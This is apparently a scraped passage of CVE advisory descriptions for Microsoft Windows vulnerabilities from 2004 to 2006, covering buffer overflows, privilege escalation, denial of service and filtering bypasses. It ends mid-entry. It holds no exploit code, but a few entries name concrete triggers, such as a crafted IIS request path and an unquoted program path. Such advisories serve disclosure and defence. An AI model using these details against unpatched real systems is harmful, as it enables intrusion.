Windows 98 and Me allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) or EMF image with a sum of entries in the vertext counts array and number of polygons that triggers a heap-based buffer overflow. [CVE-2006-2374] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to cause a denial of service (hang) by calling the MrxSmbCscIoctlCloseForCopyChunk with the file handle of the shadow device, which results in a deadlock, aka the "SMB Invalid Handle Vulnerability." [CVE-2006-2373] The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability." [CVE-2006-2372] Buffer overflow in the DHCP Client service for Microsoft Windows 2000 SP4, Windows XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a crafted DHCP response. [CVE-2006-2371] Buffer overflow in the Remote Access Connection Manager service (RASMAN) service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," that lead to registry corruption and stack corruption, aka the "RASMAN Registry Corruption Vulnerability." [CVE-2006-2370] Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability." [CVE-2006-2334] The RtlDosPathNameToNtPathName_U API function in NTDLL.DLL in Microsoft Windows 2000 SP4 and XP SP2 does not properly convert DOS style paths with trailing spaces into NT style paths, which allows context-dependent attackers to create files that cannot be accessed through the expected DOS path or prevent access to other similarly named files in the same directory, which prevents those files from being detected or disinfected by certain anti-virus and anti-spyware software. [CVE-2006-2218] Unspecified vulnerability in Internet Explorer 6.0 on Microsoft Windows XP SP2 allows remote attackers to execute arbitrary code via "exceptional conditions" that trigger memory corruption, as demonstrated using an exception handler and nested object tags, a variant of CVE-2006-1992. [CVE-2006-2094] Microsoft Internet Explorer before Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, when Prompt is configured in Security Settings, uses modal dialogs to verify that a user wishes to run an ActiveX control or perform other risky actions, which allows user-assisted remote attackers to construct a race condition that tricks a user into clicking an object or pressing keys that are actually applied to a "Yes" approval for executing the control. [CVE-2006-2056] Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1654] Directory traversal vulnerability in the HP Color LaserJet 2500 Toolbox and Color LaserJet 4600 Toolbox on Microsoft Windows before 20060402 allows remote attackers to read arbitrary files via a .. (dot dot) in an HTTP GET request to TCP port 5225. [CVE-2006-1651] DISPUTED Microsoft ISA Server 2004 allows remote attackers to bypass certain filtering rules, including ones for (1) ICMP and (2) TCP, via IPv6 packets. NOTE: An established researcher has disputed this issue, saying that "Neither ISA Server 2004 nor Windows 2003 Basic Firewall support IPv6 filtering ... This is different network protocol." [CVE-2006-1591] Heap-based buffer overflow in Microsoft Windows Help winhlp32.exe allows user-assisted attackers to execute arbitrary code via crafted embedded image data in a .hlp file. [CVE-2006-1510] Buffer overflow in calloc.c in the Microsoft Windows XP SP2 ntdll.dll system library, when used by the ILDASM disassembler in the Microsoft .NET 1.0 and 1.1 SDK, might allow user-assisted attackers to execute arbitrary code via a crafted .dll file with a large static method. [CVE-2006-1476] Windows Firewall in Microsoft Windows XP SP2 produces incorrect application block alerts when the application filename is ".exe" (with no characters before the "."), which might allow local user-assisted users to trick a user into unblocking a Trojan horse program, as demonstrated by a malicious ".exe" program in a folder named "Internet Explorer," which triggers a question about whether to unblock the "Internet Explorer" program. [CVE-2006-1475] Windows Firewall in Microsoft Windows XP SP2 does not produce application alerts when an application is executed using the NTFS Alternate Data Streams (ADS) filename:stream syntax, which might allow local users to launch a Trojan horse attack in which the victim does not obtain the alert that Windows Firewall would have produced for a non-ADS file. [CVE-2006-1315] The Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to obtain sensitive information via crafted requests that leak information in SMB buffers, which are not properly initialized, aka "SMB Information Disclosure Vulnerability." [CVE-2006-1314] Heap-based buffer overflow in the Server Service (SRV.SYS driver) in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 up to SP1, and other products, allows remote attackers to execute arbitrary code via crafted first-class Mailslot messages that triggers memory corruption and bypasses size restrictions on second-class Mailslot messages. [CVE-2006-1313] Microsoft JScript 5.1, 5.5, and 5.6 on Windows 2000 SP4, and 5.6 on Windows XP, Server 2003, Windows 98 and Windows Me, will "release objects early" in certain cases, which results in memory corruption and allows remote attackers to execute arbitrary code. [CVE-2006-1311] The RichEdit component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 [CVE-2006-1300] Microsoft .NET framework 2.0 (ASP.NET) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1 allows remote attackers to bypass access restrictions via unspecified "URL paths" that can access Application Folder objects "explicitly by name." [CVE-2006-1184] Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0, 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to cause a denial of service (crash) via a BuildContextW request with a large (1) UuidString or (2) GuidIn of a certain length, which causes an out-of-range memory access, aka the MSDTC Denial of Service Vulnerability. NOTE: this is a variant of CVE-2005-2119. [CVE-2006-0988] The default configuration of the DNS Server service on Windows Server 2003 and Windows 2000, and the Microsoft DNS Server service on Windows NT 4.0, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses. [CVE-2006-0753] Memory leak in Microsoft Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to cause a denial of service (memory consumption) via JavaScript that uses setInterval to repeatedly call a function to set the value of window.status. [CVE-2006-0561] Cisco Secure Access Control Server (ACS) 3.x for Windows stores ACS administrator passwords and the master key in the registry with insecure permissions, which allows local users and remote administrators to decrypt the passwords by using Microsoft's cryptographic API functions to obtain the plaintext version of the master key. [CVE-2006-0143] Microsoft Windows Graphics Rendering Engine (GRE) allows remote attackers to corrupt memory and cause a denial of service (crash) via a WMF file containing (1) ExtCreateRegion or (2) ExtEscape function calls with arguments with inconsistent lengths. [CVE-2006-0034] Heap-based buffer overflow in the CRpcIoManagerServer::BuildContext function in msdtcprx.dll for Microsoft Distributed Transaction Coordinator (MSDTC) for Windows NT 4.0 and Windows 2000 SP2 and SP3 allows remote attackers to execute arbitrary code via a long fifth argument to the BuildContextW or BuildContext opcode, which triggers a bug in the NdrAllocate function, aka the MSDTC Invalid Memory Access Vulnerability. [CVE-2006-0032] Cross-site scripting (XSS) vulnerability in the Indexing Service in Microsoft Windows 2000, XP, and Server 2003, when the Encoding option is set to Auto Select, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded URL, which is injected into an error message whose charset is set to UTF-7. [CVE-2006-0025] Stack-based buffer overflow in Microsoft Windows Media Player 9 and 10 allows remote attackers to execute arbitrary code via a PNG image with a large chunk size. [CVE-2006-0023] Microsoft Windows XP SP1 and SP2 before August 2004, and possibly other operating systems and versions, uses insecure default ACLs that allow the Authenticated Users group to gain privileges by modifying critical configuration information for the (1) Simple Service Discovery Protocol (SSDP), (2) Universal Plug and Play Device Host (UPnP), (3) NetBT, (4) SCardSvr, (5) DHCP, and (6) DnsCache services, aka "Permissive Windows Services DACLs." NOTE: the NetBT, SCardSvr, DHCP, DnsCache already require privileged access to exploit. [CVE-2006-0021] Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability." [CVE-2006-0020] An unspecified Microsoft WMF parsing application, as used in Internet Explorer 5.01 SP4 on Windows 2000 SP4, and 5.5 SP2 on Windows Millennium, and possibly other versions, allows attackers to cause a denial of service (crash) and possibly execute code via a crafted WMF file with a manipulated WMF header size, possibly involving an integer overflow, a different vulnerability than CVE-2005-4560, and aka "WMF Image Parsing Memory Corruption Vulnerability." [CVE-2006-0014] Buffer overflow in Microsoft Outlook Express 5.5 and 6 allows remote attackers to execute arbitrary code via a crafted Windows Address Book (WAB) file containing "certain Unicode strings" and modified length values. [CVE-2006-0013] Buffer overflow in the Web Client service (WebClnt.dll) for Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote authenticated users or Guests to execute arbitrary code via crafted RPC requests, a different vulnerability than CVE-2005-1207. [CVE-2006-0012] Unspecified vulnerability in Windows Explorer in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via attack vectors involving COM objects and "crafted files and directories," aka the "Windows Shell Vulnerability." [CVE-2006-0010] Heap-based buffer overflow in T2EMBED.DLL in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 up to SP1, Windows 98, and Windows ME allows remote attackers to execute arbitrary code via an e-mail message or web page with a crafted Embedded Open Type (EOT) web font that triggers the overflow during decompression. [CVE-2006-0008] The ShellAbout API call in Korean Input Method Editor (IME) in Korean versions of Microsoft Windows XP SP1 and SP2, Windows Server 2003 up to SP1, and Office 2003, allows local users to gain privileges by launching the "shell about dialog box" and clicking the "End-User License Agreement" link, which executes Notepad with the privileges of the program that displays the about box. [CVE-2006-0006] Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data. [CVE-2006-0005] Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute. [CVE-2005-4717] Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service (client crash) via a certain combination of a malformed HTML file and a CSS file that triggers a null dereference, probably related to rendering of a DIV element that contains a malformed IMG tag, as demonstrated by IEcrash.htm and IEcrash.rar. [CVE-2005-4560] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com. [CVE-2005-4360] The URL parser in Microsoft Internet Information Services (IIS) 5.1 on Windows XP Professional SP2 allows remote attackers to execute arbitrary code via multiple requests to ".dll" followed by arguments such as "~0" through "~9", which causes ntdll.dll to produce a return value that is not correctly handled by IIS, as demonstrated using "/_vti_bin/.dll//~0". NOTE: the consequence was originally believed to be only a denial of service (application crash and reboot). [CVE-2005-4269] mshtml.dll in Microsoft Windows XP, Server 2003, and Internet Explorer 6.0 SP1 allows attackers to cause a denial of service (access violation) by causing mshtml.dll to process button-focus events at the same time that a document is reloading, as seen in Microsoft Office InfoPath 2003 by repeatedly clicking the "Delete" button in a repeating section in a form. NOTE: the normal operation of InfoPath appears to involve a local user without any privilege boundaries, so this might not be a vulnerability in InfoPath. If no realistic scenarios exist for this problem in other products, then perhaps it should be excluded from CVE. [CVE-2005-3981] * DISPUTED NOTE: this issue has been disputed by third parties. Microsoft Windows XP, 2000, and 2003 allows local users to kill a writable process by using the CreateRemoteThread function with certain arguments on a process that has been opened using the OpenProcess function, possibly involving an invalid address for the start routine. NOTE: followup posts have disputed this issue, saying that if a user already has privileges to write to a process, then other functions could be called or the process could be terminated using PROCESS_TERMINATE. [CVE-2005-3945] The SynAttackProtect protection in Microsoft Windows 2003 before SP1 and Windows 2000 before SP4 with Update Roll-up uses a hash of predictable data, which allows remote attackers to cause a denial of service (CPU consumption) via a flood of SYN packets that produce identical hash values, which slows down the hash table lookups. [CVE-2005-3644] PNP_GetDeviceList (upnp_getdevicelist) in UPnP for Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via a DCE RPC request that specifies a large output buffer size, a variant of CVE-2006-6296, and a different vulnerability than CVE-2005-2120. [CVE-2005-3595] By default Microsoft Windows XP Home Edition installs with a blank password for the Administrator account, which allows remote attackers to gain control of the computer. [CVE-2005-3177] CHKDSK in Microsoft Windows 2000 before Update Rollup 1 for SP4, Windows XP, and Windows Server 2003, when running in fix mode, does not properly handle security descriptors if the master file table contains a large number of files or if the descriptors do not satisfy certain NTFS conventions, which could cause ACLs for some files to be reverted to less secure defaults, or cause security descriptors to be removed. [CVE-2005-3176] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not record the IP address of a Windows Terminal Services client in a security log event if the client connects successfully, which could make it easier for attackers to escape detection. [CVE-2005-3175] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows a local administrator to unlock a computer even if it has been locked by a domain administrator, which allows the local administrator to access the session as the domain administrator. [CVE-2005-3174] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows users to log on to the domain, even when their password has expired, if the fully qualified domain name (FQDN) is 8 characters long. [CVE-2005-3173] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not apply group policies if the user logs on using UPN credentials with a trailing dot, which prevents Windows 2000 from finding the correct domain controller and could allow the user to bypass intended restrictions. [CVE-2005-3172] The WideCharToMultiByte function in Microsoft Windows 2000 before Update Rollup 1 for SP4 does not properly convert strings with Japanese composite characters in the last character, which could prevent the string from being null terminated and lead to data corruption or enable buffer overflow attacks. [CVE-2005-3171] Microsoft Windows 2000 before Update Rollup 1 for SP4 records Event ID 1704 to indicate that Group Policy security settings were successfully updated, even when the processing fails such as when Ntuser.pol cannot be accessed, which could cause system administrators to believe that the system is compliant with the specified settings. [CVE-2005-3170] The LDAP client on Microsoft Windows 2000 before Update Rollup 1 for SP4 accepts certificates using LDAP Secure Sockets Layer (LDAPS) even when the Certificate Authority (CA) is not trusted, which could allow attackers to trick users into believing that they are accessing a trusted site. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-3168] The SECEDIT command on Microsoft Windows 2000 before Update Rollup 1 for SP4, when using a security template to set Access Control Lists (ACLs) on folders, does not apply ACLs on folders that are listed after a long folder entry, which could result in less secure permissions than specified by the template. [CVE-2005-2940] Unquoted Windows search path vulnerability in Microsoft Antispyware 1.0.509 (Beta 1) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, involving the programs (1) GIANTAntiSpywareMain.exe, (2) gcASNotice.exe, (3) gcasServ.exe, (4) gcasSWUpdater.exe, or (5) GIANTAntiSpywareUpdater.exe. NOTE: it is not clear whether this overlaps CVE-2005-2935. [CVE-2005-2935] Unquoted Windows search path vulnerability in Microsoft AntiSpyware might allow local users to execute code via a malicious c:\program.exe file, which is run by AntiSpywareMain.exe when it attempts to execute gsasDtServ.exe. NOTE: it is not clear whether this overlaps CVE-2005-2940. [CVE-2005-2388] Buffer overflow in a certain USB driver, as used on Microsoft Windows, allows attackers to execute arbitrary code. [CVE-2005-2307] netman.dll in Microsoft Windows Connections Manager Library allows local users to cause a denial of service (Network Connections Service crash) via a large integer argument to a particular function, aka "Network Connection Manager Vulnerability." [CVE-2005-2128] QUARTZ.DLL in Microsoft Windows Media Player 9 allows remote attackers to write a null byte to arbitrary memory via an AVI file with a crafted strn element with a modified length value. [CVE-2005-2122] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to execute arbitrary commands via a shortcut (.lnk) file with long font properties that lead to a buffer overflow in the Client/Server Runtime Server Subsystem (CSRSS), a different vulnerability than CVE-2005-2118. [CVE-2005-2120] Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call. [CVE-2005-2118] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote user-assisted attackers to execute arbitrary commands via a crafted shortcut (.lnk) file with long font properties that lead to a buffer overflow when the user views the file's properties using Windows Explorer, a different vulnerability than CVE-2005-2122. [CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code. [CVE-2005-1987] Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. [CVE-2005-1985] The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages. [CVE-2005-1984] Buffer overflow in the Print Spooler service (Spoolsv.exe) for Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via a malicious message. [CVE-2005-1983] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm. [CVE-2005-1982] Unknown vulnerability in the PKINIT Protocol for Microsoft Windows 2000, Windows XP, and Windows Server 2003 could allow a local user to obtain information and spoof a server via a man-in-the-middle (MITM) attack between a client and a domain controller when PKINIT smart card authentication is being used. [CVE-2005-1981] Unknown vulnerability in Microsoft Windows 2000 Server and Windows Server 2003 domain controllers allows remote authenticated users to cause a denial of service (system crash) via a crafted Kerberos message. [CVE-2005-1980] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service hang) via a crafted Transaction Internet Protocol (TIP) message that causes DTC to repeatedly connect to a target IP and port number after an error occurs, aka the "Distributed TIP Vulnerability." [CVE-2005-1979] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service exception and exit) via an "unexpected protocol command during the reconnection request," which is not properly handled by the Transaction Internet Protocol (TIP) functionality. [CVE-2005-1978] COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code. [CVE-2005-1793] User32.DLL in Microsoft Windows 98SE, and possibly other operating systems, allows local and remote attackers to cause a denial of service (crash) via an icon (.ico) bitmap file with large width and height values. [CVE-2005-1219] Buffer overflow in the Microsoft Color Management Module for Windows allows remote attackers to execute arbitrary code via an image with crafted ICC profile format tags. [CVE-2005-1218] The Microsoft Windows kernel in Microsoft Windows 2000 Server, Windows XP, and Windows Server 2003 allows remote attackers to cause a denial of service (crash) via crafted Remote Desktop Protocol (RDP) requests. [CVE-2005-1208] Integer overflow in Microsoft Windows 98, 2000, XP SP2 and earlier, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via a crafted compiled Help (.CHM) file with a large size field that triggers a heap-based buffer overflow, as demonstrated using a "ms-its:" URL in Internet Explorer. [CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters. [CVE-2005-1206] Buffer overflow in the Server Message Block (SMB) functionality for Microsoft Windows 2000, XP SP1 and SP2, and Server 2003 and SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka the "Server Message Block Vulnerability." [CVE-2005-1205] The Telnet client for Microsoft Windows XP, Windows Server 2003, and Windows Services for UNIX allows remote attackers to read sensitive environment variables via the NEW-ENVIRON option with a SEND ENV_USERVAR command. [CVE-2005-0852] Microsoft Windows XP SP1 allows local users to cause a denial of service (system crash) via an empty datagram to a raw IP over IP socket (IP protocol 4), as originally demonstrated using code in Python 2.3. [CVE-2005-0551] Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value. [CVE-2005-0550] Buffer overflow in Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to cause a denial of service (i.e., system crash) via a malformed request, aka "Object Management Vulnerability". [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2005-0063] The document processing application used by the Windows Shell in Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by modifying the CLSID stored in a file so that it is processed by HTML Application Host (MSHTA), as demonstrated using a Microsoft Word document. [CVE-2005-0061] The kernel of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via certain access requests. [CVE-2005-0060] Buffer overflow in the font processing component of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application. [CVE-2005-0059] Buffer overflow in the Message Queuing component of Microsoft Windows 2000 and Windows XP SP1 allows remote attackers to execute arbitrary code via a crafted message. [CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers elevate privileges or execute arbitrary code via a crafted message. [CVE-2005-0048] Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability." [CVE-2004-2527] The local and remote desktop login screens in Microsoft Windows XP before SP2 and 2003 allow remote attackers to cause a denial of service (CPU and memory consumption) by repeatedly using the WinKey+"U" key combination, which causes multiple copies of Windows Utility Manager to be loaded more quickly than they can be closed when the copies detect that another instance is running. [CVE-2004-2454] aMSN 0.90 for Microsoft Windows allows local users to obtain sensitive information such as hashed passwords from (1) hotlog.htm and (2) config.xml. [CVE-2004-2365] Memory leak in Microsoft Windows XP and Windows Server 2003 allows local users to cause a denial of service (memory exhaustion) by repeatedly creating and deleting directories using a non-standard tool such as smbmount. [CVE-2004-2339] DISPUTED Microsoft Windows 2000, XP, and possibly 2003 allows local users with the SeDebugPrivilege privilege to execute arbitrary code as kernel and read or write kernel memory via the NtSystemDebugControl function, which does not verify its pointer arguments. Note: this issue has been disputed, since Administrator privileges are typically required to exploit this issue, thus privilege boundaries are not crossed. [CVE-2004-2307] Microsoft Internet Explorer 6.0.2600 on Windows XP allows remote attackers to cause a denial of service (browser crash) via a shell: URI with double backslashes (\\) in an HTML tag such as IFRAME or A. [CVE-2004-2291] Microsoft Windows Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code via an embedded script that uses Shell Helper objects and a shortcut (link) to execute the target script. [CVE-2004-2290] Microsoft Windows XP Explorer allows attackers to execute arbitrary code via a HTML and script in a self-executing folder that references an executable file within the folder, which is automatically executed when a user accesses the folder. [CVE-2004-2289] Microsoft Windows XP Explorer allows local users to execute arbitrary code via a system folder with a Desktop.ini file containing a .ShellClassInfo specifier with a CLSID value that is associated with an executable file. [CVE-2004-2176] The Internet Connection Firewall (ICF) in Microsoft Windows XP SP2 is configured by default to trust sessmgr.exe, which allows local users to use sessmgr.exe to create a local listening port that bypasses the ICF access controls. [CVE-2004-1889] Unknown vulnerability in ftpd in SGI IRIX 6.5.20 through 6.5.23 allows remote attackers to cause a denial of service (hang) via a link failure with Microsoft Windows. [CVE-2004-1325] The getItemInfoByAtom function in the ActiveX control for Microsoft Windows Media Player 9.0 returns a 0 if the file does not exist and the size of the file if the file exists, which allows remote attackers to determine the existence of files on the local system. [CVE-2004-1324] The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer. [CVE-2004-1080] The WINS service (wins.exe) on Microsoft Windows NT Server 4.0, Windows 2000 Server, and Windows Server 2003 allows remote attackers to write to arbitrary memory locations and possibly execute arbitrary code via a modified memory pointer in a WINS replication packet to TCP port 42, aka the "Association Context Vulnerability." [CVE-2004-1049] Integer overflow in the LoadImage API of the USER32 Lib for Microsoft Windows allows remote attackers to execute arbitrary code via a .bmp, .cur, .ico or .ani file with a large image size field, which leads to a buffer overflow, aka the "Cursor and Icon Format Handling Vulnerability." [CVE-2004-0901] Microsoft Word for Windows 6.0 Converter (MSWRD632.WPC), as used in WordPad, does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Font Conversion Vulnerability," a different vulnerability than CVE-2004-0571. [CVE-2004-0900] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition does not properly validate the length of certain messages, which allows remote attackers to execute arbitrary code via a malformed DHCP message, aka the "DHCP Request Vulnerability." [CVE-2004-0899] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition, with DHCP logging enabled, does not properly validate the length of certain messages, which allows remote attackers to cause a denial of service (application crash) via a malformed DHCP message, aka "Logging Vulnerability." [CVE-2004-0897] The Indexing Service for Microsoft Windows XP and Server 2003 does not properly validate the length of a message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2004-0840] The SMTP (Simple Mail Transfer Protocol) component of Microsoft Windows XP 64-bit Edition, Windows Server 2003, Windows Server 2003 64-bit Edition, and the Exchange Routing Engine component of Exchange Server 2003, allows remote attackers to execute arbitrary code via a malicious DNS response message containing length values that are not properly validated. [CVE-2004-0727] Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability." [CVE-2004-0726] The Windows Media Player control in Microsoft Windows 2000 allows remote attackers to execute arbitrary script in the local computer zone via an ASX filename that contains javascript, which is executed in the local context in a preview panel. [CVE-2004-0575] Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation. [CVE-2004-0574] The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows. [CVE-2004-0571] Microsoft Word for Windows 6.0 Converter does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Table Conversion Vulnerability," a different vulnerability than CVE-2004-0901. [CVE-2004-0569] The RPC Runtime Library for Microsoft Windows NT 4.0 allows remote attackers to read active memory or cause a denial of service (system crash) via a malicious message, possibly related to improper length values. [CVE-2004-0540] Microsoft Windows 2000, when running in a domain whose Fully Qualified Domain Name (FQDN) is exactly 8 characters long, does not prevent users with expired passwords from logging on to the domain. [CVE-2004-0503] Microsoft Outlook 2003 allows remote attackers to bypass the default zone restrictions and execute script within media files via a Rich Text Format (RTF) message containing an OLE object for the Windows Media Player, which bypasses Media Player's setting to disallow scripting and may lead to unprompted installation of an executable when exploited in conjunction with predictable-file-location exposures such as CVE-2004-0502. [CVE-2004-0214] Buffer overflow in Microsoft Internet Explorer and Explorer on Windows XP SP1, WIndows 2000, Windows 98, and Windows Me may allow remote malicious servers to cause a denial of service (application crash) and possibly execute arbitrary code via long share names, as demonstrated using Samba. [CVE-2004-0211] The kernel for Microsoft Windows Server 2003 does not reset certain values in CPU data structures, which allows local users to cause a denial of service (system crash) via a malicious program. [CVE-2004-0210] The POSIX component of Microsoft Windows NT and Windows 2000 allows local users to execute arbitrary code via certain parameters, possibly by modifying message length values and causing a buffer overflow. [CVE-2004-0209] Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer." [CVE-2004-0208] The Virtual DOS Machine (VDM) subsystem of Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to access kernel memory and gain privileges via a malicious program that modified some system structures in a way that is not properly validated by privileged operating system functions. [CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWIndowLongPtr API functions. [CVE-2004-0206] Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. [CVE-2004-0202] IDirectPlay4 Application Programming Interface 